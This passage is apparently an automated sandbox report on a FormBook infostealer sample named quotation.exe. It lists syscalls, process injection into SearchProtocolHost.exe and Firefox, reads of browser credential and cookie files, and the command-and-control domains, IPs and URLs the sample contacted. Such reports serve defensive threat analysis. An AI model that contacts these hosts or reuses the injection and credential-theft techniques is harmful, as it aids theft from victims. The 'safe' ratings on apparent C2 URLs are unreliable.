                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtUnmapViewOfSection: Direct from: 0x76EF2D3CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: NULL target: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread register set: target process: 5176Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeThread APC queued: target process: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeProcess created: C:\Users\user\Desktop\quotation.exe "C:\Users\user\Desktop\quotation.exe"Jump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: gkTgnrvdOG.exe, 00000005.00000002.4520097810.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000005.00000000.2307370519.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520318314.0000000000D11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: gkTgnrvdOG.exe, 00000005.00000002.4520097810.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000005.00000000.2307370519.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520318314.0000000000D11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: gkTgnrvdOG.exe, 00000005.00000002.4520097810.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000005.00000000.2307370519.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520318314.0000000000D11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: gkTgnrvdOG.exe, 00000005.00000002.4520097810.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000005.00000000.2307370519.00000000019A1000.00000002.00000001.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520318314.0000000000D11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\quotation.exeQueries volume information: C:\Users\user\Desktop\quotation.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567392 Sample: quotation.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 30 www.acc888ommodate.xyz 2->30 32 www.gadgetre.info 2->32 34 17 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus detection for URL or domain 2->46 48 Multi AV Scanner detection for submitted file 2->48 52 6 other signatures 2->52 10 quotation.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 file5 28 C:\Users\user\AppData\...\quotation.exe.log, ASCII 10->28 dropped 13 quotation.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 gkTgnrvdOG.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 SearchProtocolHost.exe 13 16->19         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 22 gkTgnrvdOG.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 36 taxitayninh365.site 103.75.185.22, 50010, 50011, 50012 VNBOOKING-AS-VNVietNamBookingcorporationVN Viet Nam 22->36 38 carsten.studio 217.160.0.200, 50022, 50023, 50024 ONEANDONE-ASBrauerstrasse48DE Germany 22->38 40 11 other IPs or domains 22->40 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                quotation.exe39%ReversingLabsWin32.Trojan.Generic
                quotation.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.cortisalincontrol.net/px.js?ch=10%Avira URL Cloudsafe
                http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/0%Avira URL Cloudsafe
                http://www.cortisalincontrol.net/px.js?ch=20%Avira URL Cloudsafe
                http://www.cortisalincontrol.net/sk-logabpstatus.php?a=TWtMZ29kWWVvSVBIWGlFSGk5UEV4UFpDeUlmS21GbHVCU0%Avira URL Cloudsafe
                http://www.carsten.studio/fqxx/0%Avira URL Cloudsafe
                http://www.ana-silverco.shop/eaqq/0%Avira URL Cloudsafe
                http://www.rtpmesinkoin.click/fsgl/?PLpD=C9QsHkK47GSD7r6TBBJA1A1gthYOFQJYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9FpRWGdFmoqY0sqDryt//frta9xBWKUdk1ZjTnobcgzZTMuw==&dfxXf=5pgPlrExEj0%Avira URL Cloudsafe
                http://www.acc888ommodate.xyz/j1io/?dfxXf=5pgPlrExEj&PLpD=G6oz2WtW4adnoUNHm0mpcP4B2HtbwCYrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSataAi40vaJPFabO5lnHnDp1UEVdOTWmoEEbAO8Jrg/lBqLiQ==0%Avira URL Cloudsafe
                http://www.phoenix88.sbs/ogj2/0%Avira URL Cloudsafe
                http://www.conseilnsaftogo.org/lqxd/0%Avira URL Cloudsafe
                http://www.conseilnsaftogo.org0%Avira URL Cloudsafe
                http://conseilnsaftogo.org/lqxd/?PLpD=wYwrhtOuglxnIn28LlpI40%Avira URL Cloudsafe
                http://www.canadavinreport.site/4d2l/?PLpD=ZGBp9LUVeZbORoknng50%Avira URL Cloudsafe
                http://www.gadgetre.info/8q8w/0%Avira URL Cloudsafe
                http://www.nb-shenshi.buzz/qrcg/0%Avira URL Cloudsafe
                http://www.5tuohbpzyj9.buzz/abgi/100%Avira URL Cloudmalware
                http://www.taxitayninh365.site/ydza/0%Avira URL Cloudsafe
                http://www.cortisalincontrol.net/cbfz/0%Avira URL Cloudsafe
                http://www.carsten.studio/fqxx/?PLpD=EQE6/f8JwKBVpYrNkw4Fqaku42g/bdfb0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK3z9ursJZ5jisJa4HYxh49r+T+FoVNmB7Fsft7Yvb0T4abVw==&dfxXf=5pgPlrExEj0%Avira URL Cloudsafe
                http://www.taxitayninh365.site/ydza/?PLpD=YQDMT/cjjLIrhYhTk0Qcn1c+4/vXTHer2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1BIA0voRLPdIJFDITNJjOTEnO/NX/dE7RBJTjciFlPthnKg==&dfxXf=5pgPlrExEj0%Avira URL Cloudsafe
                http://www.phoenix88.sbs/ogj2/?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9cY7ZSSO0fgv4aLrmeCdeR22hUyiHphs3+UPMeFnjEXz3Vw==&dfxXf=5pgPlrExEj0%Avira URL Cloudsafe
                http://www.canadavinreport.site/4d2l/?PLpD=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMD88Lp4PQNylErUlYa6FSt3/cQZlayrlv3UKLh53gU+l17w==&dfxXf=5pgPlrExEj0%Avira URL Cloudsafe
                http://www.acc888ommodate.xyz/j1io/0%Avira URL Cloudsafe
                http://www.nb-shenshi.buzz/qrcg/?PLpD=1fKHCnrcuLb+woCu5SHdUNHs45cyPNHAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZHbinTcvoliy7Dmh5Jg4zqF2ez6vORVKEMmKyq03H3aWHiQ==&dfxXf=5pgPlrExEj0%Avira URL Cloudsafe
                http://www.5tuohbpzyj9.buzz/abgi/?PLpD=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flCIvo6AFeM2/skelSXUCscL7c+OC82gfnX3ulNzXIVMD/Pg==&dfxXf=5pgPlrExEj100%Avira URL Cloudmalware
                http://www.gadgetre.info/8q8w/?PLpD=oPmfzDvAiIeWP+dhDQf7HSaIzNrTwSyGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8okB+i6TciPkxAVomi9Bq2BL+qGFtNXm3IZasYXFTCdN4piQ==&dfxXf=5pgPlrExEj0%Avira URL Cloudsafe
                http://www.cortisalincontrol.net/cbfz/?PLpD=wkx2NXiTkimKkWVEm8IW4C4huKMmJZN5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXdTvTMZn4meFjRqcHxGrlREZ38HV0x/J+b0VjoEphiZZaRg==&dfxXf=5pgPlrExEj0%Avira URL Cloudsafe
                http://www.rtpmesinkoin.click/fsgl/0%Avira URL Cloudsafe
                http://www.conseilnsaftogo.org/lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4+LrVvqM62/DKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOGzEFXxYAuHOIed0EYkcd0fYA++UMHJ9G8Ni1crzSH6uPj0A==&dfxXf=5pgPlrExEj0%Avira URL Cloudsafe
                http://www.canadavinreport.site/4d2l/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                rtpmesinkoin.click
                		155.94.253.4
                		truetrue
                  		unknown
                  carsten.studio
                  		217.160.0.200
                  		truetrue
                    		unknown
                    r0lqcud7.nbnnn.xyz
                    		27.124.4.246
                    		truefalse
                      		high
                      conseilnsaftogo.org
                      		154.70.82.246
                      		truetrue
                        		unknown
                        taxitayninh365.site
                        		103.75.185.22
                        		truetrue
                          		unknown
                          www.acc888ommodate.xyz
                          		176.32.38.130
                          		truetrue
                            		unknown
                            www.5tuohbpzyj9.buzz
                            		156.232.181.155
                            		truetrue
                              		unknown
                              www.canadavinreport.site
                              		185.27.134.206
                              		truefalse
                                		high
                                phoenix88.sbs
                                		88.99.61.52
                                		truetrue
                                  		unknown
                                  www.gadgetre.info
                                  		209.74.77.107
                                  		truetrue
                                    		unknown
                                    www.ana-silverco.shop
                                    		104.21.90.137
                                    		truetrue
                                      		unknown
                                      www.cortisalincontrol.net
                                      		208.91.197.27
                                      		truetrue
                                        		unknown
                                        www.nb-shenshi.buzz
                                        		161.97.168.245
                                        		truefalse
                                          		high
                                          www.phoenix88.sbs
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.laohub10.net
                                            		unknown
                                            		unknownfalse
                                              		high
                                              www.conseilnsaftogo.org
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.carsten.studio
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.taxitayninh365.site
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.rtpmesinkoin.click
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.carsten.studio/fqxx/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.phoenix88.sbs/ogj2/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ana-silverco.shop/eaqq/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.acc888ommodate.xyz/j1io/?dfxXf=5pgPlrExEj&PLpD=G6oz2WtW4adnoUNHm0mpcP4B2HtbwCYrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSataAi40vaJPFabO5lnHnDp1UEVdOTWmoEEbAO8Jrg/lBqLiQ==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.conseilnsaftogo.org/lqxd/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rtpmesinkoin.click/fsgl/?PLpD=C9QsHkK47GSD7r6TBBJA1A1gthYOFQJYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9FpRWGdFmoqY0sqDryt//frta9xBWKUdk1ZjTnobcgzZTMuw==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.5tuohbpzyj9.buzz/abgi/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.nb-shenshi.buzz/qrcg/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.cortisalincontrol.net/cbfz/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.taxitayninh365.site/ydza/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gadgetre.info/8q8w/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.carsten.studio/fqxx/?PLpD=EQE6/f8JwKBVpYrNkw4Fqaku42g/bdfb0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK3z9ursJZ5jisJa4HYxh49r+T+FoVNmB7Fsft7Yvb0T4abVw==&dfxXf=5pgPlrExEjtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
